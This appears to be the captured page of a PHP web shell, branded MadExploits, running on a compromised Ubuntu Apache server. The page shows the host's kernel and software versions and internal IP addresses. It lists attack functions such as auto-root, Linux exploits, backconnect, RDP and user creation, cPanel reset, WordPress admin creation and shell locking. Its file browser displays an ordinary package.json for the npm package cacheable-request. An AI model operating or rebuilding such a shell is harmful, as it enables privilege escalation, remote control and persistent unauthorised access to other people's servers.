Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
cacheable-request /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
package.json
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "cacheable-request", "version": "7.0.2", "description": "Wrap native HTTP requests with RFC compliant cache support", "license": "MIT", "repository": "lukechilds/cacheable-request", "author": "Luke Childs <lukechilds123@gmail.com> (http://lukechilds.co.uk)", "main": "src/index.js", "engines": { "node": ">=8" }, "scripts": { "test": "xo && nyc ava", "coverage": "nyc report --reporter=text-lcov | coveralls" }, "files": [ "src" ], "keywords": [ "HTTP", "HTTPS", "cache", "caching", "layer", "cacheable", "RFC 7234", "RFC", "7234", "compliant" ], "dependencies": { "clone-response": "^1.0.2", "get-stream": "^5.1.0", "http-cache-semantics": "^4.0.0", "keyv": "^4.0.0", "lowercase-keys": "^2.0.0", "normalize-url": "^6.0.1", "responselike": "^2.0.0" }, "devDependencies": { "@keyv/sqlite": "^2.0.0", "ava": "^1.1.0", "coveralls": "^3.0.0", "create-test-server": "3.0.0", "delay": "^4.0.0", "eslint-config-xo-lukechilds": "^1.0.0", "nyc": "^14.1.1", "pify": "^4.0.0", "sqlite3": "^4.0.2", "this": "^1.0.2", "xo": "^0.23.0" }, "xo": { "extends": "xo-lukechilds" } }
Close